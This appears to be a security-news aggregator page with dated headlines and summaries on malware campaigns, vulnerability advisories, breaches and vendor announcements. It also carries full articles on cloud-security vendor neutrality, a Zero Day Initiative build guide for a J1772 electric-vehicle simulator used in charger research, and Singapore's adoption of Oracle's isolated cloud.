Your cloud security provider should be your second set of eyes — not the same entity responsible for your infrastructure. You lose critical checks and balances when your cloud provider is also your security vendor. No company can be entirely impartial when tasked with policing itself. Keeping security independent from infrastructure ensures risks aren’t overlooked because they conflict with a cloud service provider’s product roadmap, revenue model or strategic priorities.
2. Visibility is power — be careful who you give it to
Many security vendors see everything — your configurations, vulnerabilities and even metadata about how you use various cloud services. That visibility is necessary for protection but can become a competitive lever in the wrong hands. Ask yourself: does this vendor have other lines of business that benefit from knowing how I operate — for example, do they compete in cloud infrastructure, data services or AI/machine learning platforms? Your cloud security provider should be focused solely on protecting you — not gathering intelligence that could inform sales strategies elsewhere on how to upsell you.
3. Priorities shift — will yours still matter?
Many cloud security platforms promise broad, multi-cloud support, but priorities change. What happens when future product development leans toward one specific cloud environment? Will integrations with your preferred platforms lag? Will support or feature enhancements begin favoring certain clouds over others? Choose a partner whose roadmap aligns with your needs — not one that might shift with changing corporate objectives.
4. Plan for portability — don’t get trapped
The cloud is dynamic, and change is difficult and expensive for organizations. Don’t commit to a vendor that locks you into a specific cloud ecosystem or makes it costly to adapt as your business evolves. The best partners enable flexibility. They make it easy to scale, shift or change providers without risking your security posture — or budget.
5. Securing the cloud means more than just “cloud security”
The time for solutions that are solely focused on cloud security is coming to an end. As security threats continue to evolve, exposure management — which requires understanding business risk across all facets of the organization — should be the goal. Any security product that you adopt must be flexible enough to fit into your broader exposure management strategy. Additionally, most large organizations are operating a hybrid cloud environment, which requires visibility into the entire attack surface. As we all know, threat actors know no boundaries — all your bases must be covered — from cloud to operational technology to clients and more.
What the right cloud security provider looks like
When evaluating cloud security vendors, prioritize those who are:
· Truly cloud-agnostic — no ownership or influence from any cloud provider
· Focused solely on security, not selling you infrastructure
· Research and security innovators, with an established track record
· Equipped to protect multi-cloud and hybrid environments equally well
· Transparent about product roadmaps and priorities
· Committed to your long-term flexibility and control
Cloud security is too important to entrust to anyone whose priorities aren’t fully aligned with yours. Choose independence. Choose neutrality. Choose a partner whose only job is to protect you — wherever your cloud strategy takes you next.
by Tenable
2025-03-20 11:38:00
CERT-UA Warns: Dark Crystal RAT Targets Ukrainian Defense via Malicious Signal Messages
The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a new campaign that targets the defense sectors with Dark Crystal RAT (aka DCRat). The campaign, detected earlier this month, has been found to target both employees of enterprises of the defense-industrial complex and individual representatives of the Defense Forces of Ukraine. The activity involves
by The Hacker News
2025-03-20 10:23:40
Cisco Smart Licensing Utility flaws under attack
The SANS Internet Storm Center reported exploitation attempts against two critical vulnerabilities, which were initially disclosed in September.
by Cybersecurity Dive
2025-03-20 10:00:47
UAT-5918 targets critical infrastructure entities in Taiwan
UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting.
by Cisco Talos Blog
2025-03-20 09:55:00
The SOC case files: RansomHub exploits FortiGate bug in attack blocked by XDR
Barracuda’s Managed XDR team recently contained a determined and complex attack by a ransomware gang. The attackers had been trying to find a way into a manufacturing company’s network since December 2024 and finally succeeded by exploiting an exposed firewall vulnerability.
by Barracuda
2025-03-20 09:07:00
NCSC proposes three-step plan to move to quantum-safe encryption
by ComputerWeekly
2025-03-20 09:00:00
Top 7 Internal Developer Platforms (IDPs) to Watch in 2025
Discover the best IDP solutions for streamlining software development, improving consistency, and enabling self-service access to development tools.
by ITPro Today
2025-03-20 09:00:00
Low-Cost Drone Add-Ons From China Let Anyone With a Credit Card Turn Toys Into Weapons of War
Chinese ecommerce giants like Temu and AliExpress sell drone accessories like those used by soldiers in the Russia-Ukraine conflict.
by WIRED Security News
2025-03-20 07:18:00
SideWinder Threat Group: Maritime and Nuclear Sectors at Risk with Updated Toolset
SideWinder, also known as Rattlesnake or T-APT-04, is an advanced persistent threat group that has been active since at least 2012 and is believed to originate from India. Traditionally targeting government, military, and business entities across Asia, the group has recently broadened its focus. It now intensifies attacks on maritime and logistics sectors in South and Southeast Asia, the Middle East, and Africa while also showing a marked interest in nuclear power plants and energy institutions [2]. A hallmark of SideWinder is its rapid adaptation to security detections, as it monitors when security solutions identify its tools and modifies its malware, often within hours, to evade detection.
by Picus Security
2025-03-20 06:19:59
MITRE ATT&CK T1562.006 Impair Defenses: Indicator Blocking
Indicator Blocking is a defense evasion technique that adversaries use to prevent security tools from detecting or reporting malicious activity by interfering with indicators of compromise (IOCs). Security solutions such as endpoint detection and response (EDR), antivirus software, and intrusion detection systems (IDS) rely on IOCs such as file hashes, network connections, domain names, and registry changes to identify and flag potential threats. By blocking these indicators from being generated, logged, or transmitted, attackers can evade detection and maintain persistence within a compromised environment.
by Picus Security
2025-03-20 05:00:00
Improved support for private applications and reusable access policies with Cloudflare Access
We are excited to introduce support for private hostname and IP address-defined applications as well as reusable access policies.
by Cloudflare
2025-03-20 04:00:00
Overcoming AppSec Challenges in FinServ: How CIBC Balances Speed, Security, and Compliance
Join Snyk’s Field CTO, Steven Schmidt, and Mihai Saveschi, Senior Director of Security Service Management at CIBC, for an exclusive fireside chat on the evolving landscape of application security in financial services.
by Snyk
2025-03-20 03:30:00
India Is Top Global Target for Hacktivists, Regional APTs
Global politics and a growing economy draw the wrong kind of attention to India, with denial-of-service and application attacks both on the rise.
by Dark Reading
2025-03-20 01:26:12
DOGE to Fired CISA Staff: Email Us Your Personal Data
A message posted on Monday to the homepage of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) is the latest exhibit in the Trump administration's continued disregard for basic cybersecurity protections. The message instructed recently-fired CISA employees to get in touch so they can be rehired and then immediately placed on leave, asking employees to send their Social Security number or date of birth in a password-protected email attachment -- presumably with the password needed to view the file included in the body of the email.
by Krebs on Security
2025-03-20 00:21:13
How a $6M bet on Wiz turned into a massive 200x return for one early backer
Wiz’s $32 billion all-cash acquisition by Google parent Alphabet promises a colossal payday for the cybersecurity startup’s early-stage investors. The deal is a big win for Sequoia, one of the best-known VC firms, which stands to make $3 billion, about 25x the money it invested in the company, Bloomberg reported. Despite substantial returns for Sequoia’s […]
by TechCrunch
2025-03-20 00:00:00
Announcing the CrowdStrike 2025 Global CrowdTour: Bringing the Power of the Crowd to a City Near You
by CrowdStrike
2025-03-20 00:00:00
CrowdStrike Researchers Develop Custom XGBoost Objective to Improve ML Model Release Stability
by CrowdStrike
2025-03-20 00:00:00
Shedding light on the ABYSSWORKER driver
Elastic Security Labs describes ABYSSWORKER, a malicious driver used with the MEDUSA ransomware attack-chain to disable anti-malware tools.
by Elastic Security Lab
2025-03-20 00:00:00
[webapps] FluxBB 1.5.11 - Stored Cross-Site Scripting (XSS)
by Exploit DB
2025-03-20 00:00:00
[webapps] JUX Real Estate 3.4.0 - SQL Injection
by Exploit DB
2025-03-20 00:00:00
ZDI-25-175: (0Day) Luxion KeyShot USDC File Parsing Use-After-Free Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2532.
by Zero Day Initiative Advisories
2025-03-20 00:00:00
ZDI-25-174: (0Day) Luxion KeyShot DAE File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2531.
by Zero Day Initiative Advisories
2025-03-20 00:00:00
ZDI-25-173: (0Day) Luxion KeyShot DAE File Parsing Access of Uninitialized Pointer Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2530.
by Zero Day Initiative Advisories
2025-03-19 22:35:00
Hacked, leaked, exposed: Why you should never use stalkerware apps
Using stalkerware is creepy, unethical, potentially illegal, and puts your data and that of your loved ones in danger.
by TechCrunch
2025-03-19 22:30:07
Data breach at stalkerware SpyX affects close to 2 million, including thousands of Apple users
Another consumer-grade spyware operation was hacked in June 2024, which exposed thousands of Apple Account credentials.
by TechCrunch
2025-03-19 21:22:00
Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners
Threat actors are exploiting a severe security flaw in PHP to deliver cryptocurrency miners and remote access trojans (RATs) like Quasar RAT. The vulnerability, assigned the CVE identifier CVE-2024-4577, refers to an argument injection vulnerability in PHP affecting Windows-based systems running in CGI mode that could allow remote attackers to run arbitrary code. Cybersecurity company
by The Hacker News
2025-03-19 21:19:12
Critical Fortinet Vulnerability Draws Fresh Attention
CISA this week added CVE-2025-24472 to its catalog of known exploited vulnerabilities, citing ransomware activity targeting the authentication bypass flaw.
by Dark Reading
2025-03-19 20:29:20
Nation-State Groups Abuse Microsoft Windows Shortcut Exploit
Trend Micro uncovered a method that nation-state threat actors are using to target victims via the Windows .lnk shortcut file extension.
by Dark Reading
2025-03-19 20:14:00
You have 2 days to update Firefox before everything breaks
Don't find out the hard way that this upgrade isn't optional.
by ZDNET Security
2025-03-19 20:13:00
DMARC domain fraud protection: Not sexy. But really important.
Learn about the details of our upcoming webinar on DMARC and the benefits of doing it right in this webinar preview post.
by Barracuda
2025-03-19 19:34:59
Enterprises Gain Control Over LLM Oversharing With Prompt Security's GenAI Authorization
by Dark Reading
2025-03-19 19:29:03
Infosys Settles $17.5M Class Action Lawsuit After Sprawling Third-Party Breach
Several major companies in the finance sector were impacted by the third-party breach, prompting them to notify thousands of customers of their compromised data.
by Dark Reading
2025-03-19 19:24:52
An existential threat: Disinformation ‘single biggest risk’ to Canadian democracy
The DFRLab reviews Canada’s 2025 Public Inquiry into Foreign Interference The post An existential threat: Disinformation ‘single biggest risk’ to Canadian democracy appeared first on DFRLab.
by DFRLab
2025-03-19 19:22:17
Women in CyberSecurity and ISC2 Announce the WiCyS + ISC2 Certified in CybersecuritySM Certification Spring Camp
by Dark Reading
2025-03-19 19:20:00
Leaked Black Basta Chats Suggest Russian Officials Aided Leader's Escape from Armenia
The recently leaked trove of internal chat logs among members of the Black Basta ransomware operation has revealed possible connections between the e-crime gang and Russian authorities. The leak, containing over 200,000 messages from September 2023 to September 2024, was published by a Telegram user @ExploitWhispers last month. According to an analysis of the messages by cybersecurity company
by The Hacker News
2025-03-19 19:08:23
Make Cloud Attacks Yesterday’s Problem with Mitiga at RSA Conference 2025
Visit Mitiga at booth number N-4618 at RSA Conference 2025 to learn about cloud detection and response.
by Mitiga
2025-03-19 18:52:32
Emulating the Sophisticated Chinese Adversary Salt Typhoon
AttackIQ has released a new assessment template that emulates the various post-compromise Tactics, Techniques, and Procedures (TTPs) associated with the sabotage-motivated Chinese adversary Salt Typhoon. The post Emulating the Sophisticated Chinese Adversary Salt Typhoon appeared first on AttackIQ.
by AttackIQ
2025-03-19 18:40:54
Building an electric vehicle simulator to research EVSEs
Researching and reverse engineering Level 2 Electric Vehicle Supply Equipment (EVSE or loosely “charger”) efforts might require the equipment to be placed beyond the idle state. The idle state is straightforward and usually involves nothing more than powering up the charger. Indeed, this is a very useful state for research where the user interface is in operation, communications both wired and wireless are working and the mobile device app can interact. However, there are times when there is a need to force the charger into other states so that it behaves as though the electric vehicle is attached, the EV is asking for charge, or the EV is charging and the EVSE is providing charging current. At the Pwn2Own Automotive 2025 event, an add-on category was introduced that required a demonstration of an exploit while the equipment was in the charging state. This required manipulation of the charger via the charging cable in order to enter this charging state. This blog describes the device that we assembled to achieve this requirement. I will cover the design considerations that were made along with how the device operates. I will also provide the specifics on parts that we used; however, due to the wide range of requirements different researchers might have and substitutions they might make, I will only highlight the important points of the design and not describe this as a “step-by-step” build. As an example of a minimal “simulator” build, some chargers have been observed to provide an output signal when the charging cable attaches to the vehicle. If your research only involves this signal, then a diode and a single resistor inside your EV simulator enclosure may be enough to achieve your goal. So, understand our device first and then use that knowledge to build what you require for your research.
Safety
First and foremost is safety. If you are familiar with researching EVSE, you know that you will be dealing with deadly voltages. This is the case here as well. Even more dangerous is the fact that the EV simulator will enable the high voltage onto the charging cable and inside the simulator itself. This increases the number of components that have high voltage and thus increases the danger. Every precaution and safety measure should be taken in dealing with high voltage and high current. If you are not knowledgeable and confident with working around deadly high voltages or are not sure of appropriate safety measures, do not attempt to build a simulator or work with EVSE. An alternative might be to educate yourself and ask others with the appropriate qualifications for help. As we were about to publish this blog, we found some pre-built devices that are limited but might still be an option for some. These are listed in the “Pre-Built Alternatives” section below.
Basic Operation
The EV simulator is based on SAE J1772 operation. There are other standards that define EVSE to EV connections but our focus in this blog is strictly J1772. The basic information needed can be found here. The key items this implies are:
· J1772-2009 connector is used.
· Control signaling (over the Control Pilot signal) is strictly PWM/duty cycle.
If you study the wiki link above, you will see that the EV communicates to the EVSE on the CP line via a resistor network in the vehicle. The EVSE will sense a resistance to determine if the cable is connected to the EV (2740 ohms) and if the vehicle wants charging (882 ohms). On the flip side, the EVSE provides a 1kHz PWM signal to the vehicle to indicate the maximum current that the EVSE is willing to provide to the EV. This is done through the duty cycle of the signal. The duty cycle to current mapping is defined by J1772.
The EV simulator provides the proper resistance values using a rotary switch and monitors the PWM signal with a low-cost onboard oscilloscope. These parts reside on or inside a plastic enclosure to provide safety from high voltage and anchor the main components.
In our EV simulator, the rotary switch is set to “0” when we want to simulate a disconnected cable. It is set to “1” to simulate a connection to a vehicle but no charge being requested. Finally, it is set to “2” to simulate a connected vehicle requesting a charge. These are the only three states that we decided to incorporate into our simulator.
Figure 1 – The EV Simulator at the time of P2O Automotive Tokyo 2025
Parts
This is a list of components that we used to build our EV simulator and their links to Amazon USA. The resistors come in a kit, and we used 2700ohm for the 2740ohm requirement and 820ohm for the 882ohm requirement. These approximate values appeared to work on the EVSEs that we tested. However, you could find a more particular EVSE that needs values closer to the specification. In that case, you could combine other resistors in the kit to get closer to the specification.
As for the diode, you should try to use the one we used or one with even lower Vf specification. This diode worked with all of the chargers we were able to test. We tried higher Vf diodes with limited success. Some chargers were more tolerant of a higher Vf but many were not. The diode is required because most EVSE will test for its existence as a safety measure.
· Project box: LeMotech Junction Box
· Receptacle: J1772 receptacle
· Resistor 2740 ohm and 882 ohm: Chanzon 300 Piece Resistor Kit
· Diodes: Chanzon 1N5817 Schottky Barrier Rectifier Diodes
· Rotary switch: Taiss Universal Changeover Switch
· Volt/Amp Meter: DROK Volt Amo Meter
· Oscilloscope: FNIRSI DSO152 Oscilloscope
· Load Plug: 20FT NEMA 6-15P/6-15R Power Extension Cord
· Load: Cadet F Series Baseboard Heater
Considerations
A few of the items are not strictly necessary but do help in verifying the simulator is working as expected. Substitutions are also possible depending on your needs.
The bare minimum is the enclosure, the J1772 receptacle, and the proper resistor and diode values. How you manipulate the resistor network, monitor the PWM signal, and if you do or do not implement a load is flexible and up to you.
Assembly of (Our) EV Simulator
Our initial step in assembly was to drill or cut holes into the plastic enclosure. Placement isn’t critical; however, we did attempt to make things ergonomic and to not block the indicators with cables or our hands while manipulating the switch. Secondly, we connected the resistors and diode to the rotary switch and mounted that assembly inside the enclosure. This circuit connects to the Control Pilot (CP) and Protective Earth (PE) inside the enclosure.
Figure 2 – Schematic of components connected to the rotary switch.
Again, this was our implementation. We left S0 on our switch open to simulate a cable in the unconnected state without having to physically plug and unplug the cable. We also chose to control the two resistor states (S1 and S2) separately. The schematic in the wiki shows a different configuration in which only one toggle is required, and the values of the resistors are adjusted. Both are valid so build based on your constraints. Finally, as seen in the schematic, we did not utilize states 3-5 on the rotary switch because the additional charging states were not needed for our research at the time.
Next, the J1772 receptacle needs to be wired.
Figure 3 – The J1772 charge connector as seen from the open end
If you choose not to add a load to the simulator, the wiring is fairly easy. You only need to bring out the Control Pilot (CP) signal and the Protective Earth (PE) from the back of the connector. If you want to include a simulated battery load, you will need to also bring out the two high voltage lines (L1 and L2/N) with the appropriate size wire (remember, these can be high current depending on the load you pick). We conservatively used a 12-gauge wire, and our anticipated load was 500W. L1 and L2/N were then routed out of the enclosure to a plug so that the 500W load could be removed or added at will. The plug (in the material list above) was a heavy-duty extension cord that we cut and hardwired to the enclosure on one side and to the load on the other side. We also included a Volt/Amp meter to monitor the J1772 receptacle. When the EVSE engaged charging, the meter would show 230V (in our case) and 2.2A if the load was attached; otherwise, 0A. Finally, an inexpensive battery-powered oscilloscope was attached with double-sided tape to the front of the enclosure. The probe cable was routed inside to monitor the PWM signal present on the CP wire. This simple scope defaulted to displaying several measurements, which included a duty cycle, so it was a good fit for this purpose. Other than pressing “Auto Set” once the 1kHz signal was present, there was no other configuration required.
Thus, the full enclosure schematic is:
Figure 4 – The full schematic of our EV simulator
Targets
This EV simulator was evaluated on all of the targets used at Pwn2Own Automotive 2025. This included Level 2 chargers from Autel, ChargePoint, WOLFBOX, Emporia, Ubiquiti, and Tesla (with NACS adaptor). All the EVSE devices were successfully placed into the charging state and 500W was provided to the load using this simulator.
Pre-Built Alternatives
As mentioned in the “Safety” section, we noticed a few consumer devices, which might be adequate for some research and would avoid having to assemble any parts. These devices appear to be designed primarily to charge electric scooters from an EVSE. To do this, they effectively provide the minimum circuit to enable the EVSE to energize the cable. Note that these do not provide a direct way to measure the CP signal. Always follow the manufacturer’s safety instructions when using these devices.
· 220V J1772 Type1 Socket to NEMA 5-15/5-20 EV Charger Adapter
· J1772 to Nema 5-20, EV Station Charging Adapter
Final Thoughts
The J1772 standard is straightforward to implement for the limited purpose of emulating an attached vehicle to these chargers. There are more sophisticated protocols on the horizon (CAN over the CP signal) but most of the consumer-grade EVSEs continue to utilize J1772. Additionally, with such a large established base of J1772, support from the EVSEs and the EVs will likely continue far into the future. Hopefully, this blog describing our design considerations and how we built our EV simulator will simplify the process for other researchers. While official contest specifics are still months away for the Pwn2Own Automotive event for 2026, there will almost certainly be a contest category for using the charging cable as the attack surface again. This was a highlighted addition to the 2025 event over 2024 and we hope to build on that for 2026.
Until then, you can follow us on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2025-03-19 18:01:32
Survey findings: How is AI Impacting the SOC?
Part 3/4: Darktrace releases insights on the State of AI in cybersecurity. This blog discusses the impact of AI-powered attacks and the capabilities of AI defense on the SOC.
by Darktrace
2025-03-19 17:05:03
AI Cloud Adoption Is Rife With Cyber Mistakes
Research finds that organizations are granting root access by default and making other big missteps, including a Jenga-like building concept, in deploying and configuring AI services in cloud deployments.
by Dark Reading
2025-03-19 17:05:00
Watch This Webinar to Learn How to Eliminate Identity-Based Attacks—Before They Happen
In today’s digital world, security breaches are all too common. Despite the many security tools and training programs available, identity-based attacks—like phishing, adversary-in-the-middle, and MFA bypass—remain a major challenge. Instead of accepting these risks and pouring resources into fixing problems after they occur, why not prevent attacks from happening in the first place? Our upcoming
by The Hacker News
2025-03-19 17:00:00
The Things We Think and Do Not Say: The Future of Our Beacon Object Files (BOFs)
Learn about a reference design for a new Beacon Object Files portable executable concept and helpful features. The post The Things We Think and Do Not Say: The Future of Our Beacon Object Files (BOFs) appeared first on NetSPI.
by NetSPI
2025-03-19 17:00:00
Analytics company Dataminr secures $85M to fund growth
Dataminr, a data analytics company that counts NATO and OpenAI among its customers, has raised $85 million in a combination of convertible financing and credit, the company announced on Wednesday. It’s chump change for Dataminr, which closed a $475 million round at a $4.1 billion valuation in 2021. But the company has seen its fair […]
by TechCrunch
2025-03-19 16:37:14
The Core Pillars of Cyber Resiliency
As cyberattacks grow more sophisticated, organizations must adopt a proactive, multi-layered approach to cyber resilience.
by ITPro Today
2025-03-19 16:29:00
ClearFake Infects 9,300 Sites, Uses Fake reCAPTCHA and Turnstile to Spread Info-Stealers
The threat actors behind the ClearFake campaign are using fake reCAPTCHA or Cloudflare Turnstile verifications as lures to trick users into downloading malware such as Lumma Stealer and Vidar Stealer. ClearFake, first highlighted in July 2023, is the name given to a threat activity cluster that employs fake web browser update baits on compromised WordPress as a malware distribution vector. The
by The Hacker News
2025-03-19 16:00:00
5 Identity Threat Detection & Response Must-Haves for Super SaaS Security
Identity-based attacks are on the rise. Attackers are targeting identities with compromised credentials, hijacked authentication methods, and misused privileges. While many threat detection solutions focus on cloud, endpoint, and network threats, they overlook the unique risks posed by SaaS identity ecosystems. This blind spot is wreaking havoc on heavily SaaS-reliant organizations big and small
by The Hacker News
2025-03-19 15:51:14
How to Turn Developer Team Friction Into a Positive Force
Friction is a force that surrounds everyone all of the time. For developer teams, it can be a source of both inspiration and irritation for IT leaders.
by ITPro Today
2025-03-19 15:44:55
Cybercriminals Taking Advantage of 'Shadow' Alliances, AI
A Europol report says nation-state actors are increasingly working with organized crime networks to achieve geopolitical goals, including the destabilization of the EU.
by Dark Reading
2025-03-19 15:42:35
US teachers’ union says hackers stole sensitive personal data on over 500,000 members
PSEA says it "took steps to ensure" its stolen data was deleted, suggesting a ransom demand was paid.
by TechCrunch
2025-03-19 15:38:15
Connecting the other half of humanity is the deal of the century
China is investing billions in global internet infrastructure through its Digital Silk Road Initiative, advancing its interests over the US.
by DFRLab
2025-03-19 15:35:32
Cross-platform multilingual campaign amplifies biolabs conspiracy targeting US and Armenia
Campaign exploits long-running false and misleading claims purporting US bioweapons-related activity in Europe and elsewhere.
by DFRLab
2025-03-19 15:35:12
These 10 weak passwords can leave you vulnerable to remote desktop attacks
Is your password on the list? If so - tsk, tsk.
by ZDNET Security
2025-03-19 14:29:01
Nominations Open for 2025 European Cybersecurity Blogger Awards
Eskenzi PR are proud to announce that nominations are open for the 12th annual European Cybersecurity Bloggers Awards. The 2025 event is sponsored by Keeper Security and Pulse Conferences and supported once again by media partners, Infosecurity Magazine and the IT Security Guru. The awards will take place at Novotel London ExCeL on the 4th […]
by IT Security Guru
2025-03-19 14:10:57
Cape opens $99/month beta of its privacy-first mobile plan, inks Proton deal, raises $30M
Mobile networks continue to be a major target for cybersecurity breaches, and Chinese hacking group Salt Typhoon’s persistent attacks on multiple carriers are only the latest known examples. The mobile carrier startup Cape is taking a novel approach to addressing the problem: It has built a service it says can provide a more secure, private […]
by TechCrunch
2025-03-19 14:00:00
Why Cybersecurity Needs More Business-Minded Leaders
The question is no longer "Are we compliant?" but "Are we truly resilient?"
by Dark Reading
2025-03-19 13:58:19
Be Vigilant: BEC Attacks Are on the Rise
Business email compromise (BEC) attacks rose 13% last month, with the average requested wire transfer increasing to $39,315, according to a new report from Fortra.
by KnowBe4
2025-03-19 13:25:32
The “free money” trap: How scammers exploit financial anxiety
With financial stress at an all-time high, people are desperately seeking relief. Sadly, scammers know this all too well.
by Malwarebytes Labs
2025-03-19 13:10:00
Cloudflare for AI: supporting AI adoption at scale with a security-first approach
With Cloudflare for AI, developers, security teams and content creators can leverage Cloudflare’s network and portfolio of tools to secure, observe and make AI applications resilient and safe to use.
by Cloudflare
2025-03-19 13:05:04
Linux Foundation's trust scorecards aim to battle rising open-source security threats
How do you tell the difference between trustworthy open-source developers and hackers? Here's one idea.
by ZDNET Security
2025-03-19 13:00:00
Improved Bot Management flexibility and visibility with new high-precision heuristics
By building and integrating a new heuristics framework into the Cloudflare Ruleset Engine, we now have a more flexible system to write rules and deploy new releases rapidly.
by Cloudflare
2025-03-19 13:00:00
Take control of public AI application security with Cloudflare's Firewall for AI
Firewall for AI discovers and protects your public LLM-powered applications, and is seamlessly integrated with Cloudflare WAF. Join the beta now and take control of your generative AI security.
by Cloudflare
2025-03-19 13:00:00
Trapping misbehaving bots in an AI Labyrinth
How Cloudflare uses generative AI to slow down, confuse, and waste the resources of AI Crawlers and other bots that don’t respect “no crawl” directives.
by Cloudflare
2025-03-19 13:00:00
An early look at cryptographic watermarks for AI-generated content
It's hard to tell the difference between web content produced by humans and web content produced by AI. We're taking a new approach to making AI content distinguishable without impacting performance.
by Cloudflare
2025-03-19 13:00:00
How we train AI to uncover malicious JavaScript intent and make web surfing safer
Learn more about how Cloudflare developed an AI model to uncover malicious JavaScript intent using a Graph Neural Network, from pre-processing data to inferencing at scale.
by Cloudflare
2025-03-19 13:00:00
Fort Knox for Your Data: How Elasticsearch X-Pack Locks Down Your Cluster – Part 1
Picture this: an always-awake, never-tired, high-speed librarian that instantly finds the exact information you need from a massive collection of books. This extraordinary librarian is also capable of processing millions of requests simultaneously, understands partial or misspelled words, and even predicts what you’re looking for before you finish asking.
by SpiderLabs Blog
2025-03-19 13:00:00
Introducing ThreatDown OneView free self-serve trial for MSPs
We’re giving MSPs a 15-day, no-obligation trial to explore the OneView Platform on their own terms.
by ThreatDown
2025-03-19 12:52:48
Over 15 women graduate from new cybersecurity training programme
More than 15 women have graduated from cyberUPLIFT, a new cybersecurity training programme from TECwomen, a community-interest company committed to supporting, training, and building a network for women who work or aspire to work in the Technology, Engineering, and Creative Digital industries. The programme, which builds on the success of TECwomen’s digitalUPLIFT initiative, was developed […]
by IT Security Guru
2025-03-19 12:35:01
Global Technology Provider Transforms Email Threat Detection with Darktrace
To strengthen its distributed and complex operations, this global technology leader implemented Darktrace / EMAIL to monitor, detect, and mitigate potential email threats. Read the blog to discover their results.
by Darktrace
2025-03-19 12:29:00
Critical mySCADA myPRO Flaws Could Let Attackers Take Over Industrial Control Systems
Cybersecurity researchers have disclosed details of two critical flaws impacting mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system used in operational technology (OT) environments, that could allow malicious actors to take control of susceptible systems. "These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially
by The Hacker News
2025-03-19 12:01:00
Researchers name six countries as likely customers of Paragon’s spyware
The Citizen Lab said it believes several governments may be customers of spyware maker Paragon Solutions.
by TechCrunch
2025-03-19 11:35:56
Sperm bank breach deposits data into hands of cybercriminals
Sperm donor giant California Cryobank has announced it has suffered a data breach that exposed customers' personal information.
by Malwarebytes Labs
2025-03-19 11:31:31
Google acquisition of Wiz driven by enterprise embrace of multicloud
The combined security platform will expand Google’s reach across a range of major cloud environments.
by Cybersecurity Dive
2025-03-19 11:00:00
How Can I Resolve Conflicts Between On-Premises AD and Azure AD Integration?
An IT pro asks for advice on troubleshooting synchronization and password issues when integrating on-premises Active Directory with Azure AD.
by ITPro Today
2025-03-19 10:50:51
11 nation-state groups exploit unpatched Microsoft zero-day
The tech giant has yet to address a vulnerability that allows for malicious payloads to be delivered via Windows shortcut files and has been under active attack for eight years.
by Cybersecurity Dive
2025-03-19 10:42:25
The default TV setting you should turn off ASAP - and why it makes such a big difference
Also known as the 'soap opera effect,' motion smoothing is ideal for gaming and live sports but less so for everything else. Here's how to turn off the feature.
by ZDNET Security
2025-03-19 10:35:00
CISA Warns of Active Exploitation in GitHub Action Supply Chain Compromise
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a vulnerability linked to the supply chain compromise of the GitHub Action, tj-actions/changed-files, to its Known Exploited Vulnerabilities (KEV) catalog. The high-severity flaw, tracked as CVE-2025-30066 (CVSS score: 8.6), involves the breach of the GitHub Action to inject malicious code that enables a remote
by The Hacker News
2025-03-19 10:30:41
The sixth sense for cyber defense: Multimodal AI
Sophos X-Ops’ research, presented at Virus Bulletin 2024, uses ‘multimodal’ AI to classify spam, phishing, and unsafe web content.
by Sophos News
2025-03-19 10:15:10
Singapore Inks Deal with Oracle for “Isolated” Cloud Computing and AI Services
Singapore will now have access to Oracle's high-performance, air-gapped, and secure cloud computing, data management, and artificial intelligence (AI) services. Singapore's Ministry of Defence (MINDEF) inked a deal on Tuesday with the U.S. cloud computing giant for the use of its "Oracle Cloud Isolated Region." The platform is set to strengthen Singapore's digital capabilities as part of its modernization efforts. The Defence Science and Technology Agency (DSTA), the technology arm of MINDEF, will leverage OCI to enhance operational efficiency, cybersecurity, and scalability.

Enhancing National Defense with Cloud Technology
DSTA's decision to integrate OCI into its digital infrastructure is aimed at supporting MINDEF’s critical functions. “The demand for secure and scalable cloud solutions is growing. It is more than just data storage and computing—it will be the foundation for a lot of innovation," said Ng Chad-Son, Chief Executive of DSTA. "Through this pilot collaboration with Oracle, we will harness advanced cloud and AI technologies to digitalise and transform our operations.”

By utilizing OCI, MINDEF gains access to high-performance computing, artificial intelligence (AI), and machine learning (ML) capabilities. This will allow the ministry to improve real-time analytics, streamline decision-making, and fortify cyber resilience against evolving threats.

Why Oracle Cloud?
Oracle’s cloud solutions provide MINDEF with enhanced security features and data sovereignty—critical factors for government agencies handling sensitive information. The collaboration between Oracle and DSTA will ensure that defense-related workloads remain protected while benefiting from the flexibility and cost-efficiency of cloud computing. Oracle Cloud Infrastructure is designed to support mission-critical operations with built-in security, high availability, and compliance with strict regulatory requirements. Oracle Cloud Isolated Region is a sovereign, air-gapped OCI region offering the same services as public OCI regions. Fully disconnected from the internet, it provides MINDEF and the SAF with a secure, scalable, and resilient environment for enhanced insights and faster decision-making.

“Oracle has safeguarded the world’s most sensitive data for decades. We are pleased to bring this expertise to support the Singapore defence community’s missions,” said Rand Waldron, Global Defense CTO of Oracle. “Our air-gapped, isolated cloud regions bring the capabilities of our public cloud and defense ecosystem to the world's most secure networks. Oracle is built to deliver the highest levels of security and performance for governments around the world.”

This new partnership will likely deliver next-generation cloud solutions tailored to the specific needs of Singapore’s defense sector, the authorities believe.

Scalability and Future Readiness
One of the key advantages of adopting OCI is its scalability. As defense operations evolve, MINDEF will require a flexible cloud infrastructure capable of adapting to emerging technologies. Oracle’s cloud solutions offer seamless integration with existing systems, ensuring that future upgrades and expansions can be implemented efficiently. Additionally, OCI’s global presence and localized data centers give MINDEF the ability to scale resources dynamically, optimizing performance and cost-effectiveness. This ensures that Singapore’s defense ecosystem remains agile in responding to new challenges and operational demands.

